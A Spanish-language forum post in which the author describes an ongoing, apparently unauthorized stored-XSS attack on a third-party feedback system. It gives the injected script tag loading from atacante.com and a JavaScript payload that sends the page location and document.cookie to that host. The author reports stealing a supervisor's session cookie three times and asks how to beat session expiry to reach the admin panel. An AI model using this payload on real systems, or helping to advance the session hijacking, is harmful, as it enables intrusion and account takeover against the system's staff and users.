Pues necesito su ayuda, asi esta la cosa:
Existe un sistema en donde tu pones tu duda, sugerencia, comentario etc.. y una persona te responde a tu comentario (en un par de dias ) bueno, la cuestion es que ese sistema es vulnerable a xss (lo se por que ya he hecho pruebas), el sistema al que estoy atacando es completamente desconocido (yo envio el comentario y puedo verlo desde el punto de vista de un usuario comun, pero no tengo idea de lo que ve el encargado) nisiquiera se puede saber en que pagina va a ser visualizado el mensage, entonces lo que hice fue esto:
linea de escape en el msg
Código
<script src=http://atacante.com/script.js ></script>
script.js
Código
asi consigo la cookie y tambien se donde usarla =D
window.onload=function(){ var a = document.getElementsByTagName("body"); var ar = a[0]; ar.innerHTML += "<img height=1 width=1 src=http://atacante.com/script.php?ref="+escape(document.location)+"&cook="+escape(document.cookie)+" >"; }
El problema es que el sistema se desloguea automaticamente despues de 10 mins de no hacer nada,
todo el sistema esta administrado por sessiones (entonces capturar la cookie no me ayuda a descifrar nada).
Ya he conseguido la cookie del supervisor 3 veces, tambien se donde esta la pagina de administracion pero el problema es que cuando intento usar la session obtenida ya esta caducada, no tienen alguna idea de como puedo avanzar?
saludos!